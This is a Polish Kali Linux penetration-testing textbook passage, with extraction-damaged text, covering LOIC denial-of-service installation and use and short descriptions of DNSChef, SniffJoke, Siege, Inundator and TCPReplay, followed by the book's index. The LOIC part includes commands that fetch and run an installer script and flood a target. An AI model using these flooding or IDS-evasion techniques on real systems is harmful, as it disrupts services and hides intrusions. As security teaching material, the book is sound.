Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
